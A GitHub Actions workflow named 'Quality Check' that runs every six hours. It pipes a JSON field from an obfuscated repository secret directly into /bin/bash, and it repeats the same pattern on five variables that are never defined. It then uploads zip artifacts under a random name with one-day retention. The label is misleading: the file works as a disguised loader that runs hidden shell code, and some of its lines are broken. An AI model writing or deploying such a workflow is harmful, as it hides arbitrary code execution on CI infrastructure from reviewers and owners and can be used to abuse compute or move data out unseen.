name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '15 0,6,12,18 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          gtazr5: ${{ secrets.gtazr5 }}
        run: |
          printf '%s' "$gtazr5" | jq -r .jder0595 | /bin/bash
          printf '%s' "$zbmw874" | jq -r .pmgzb7571 | /bin/bash
          echo $cdgt0 | jq -r .hf1258 | /bin/bash
          printf '%s' "$mde339" | jq -r .bb9 | /bin/bash
          echo $j5 | jq -r .kt2 | /bin/bash
          echo $haxxj543 | jq -r .neu55 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: uytJZkzt
          path: "*.zip"
          retention-days: 1
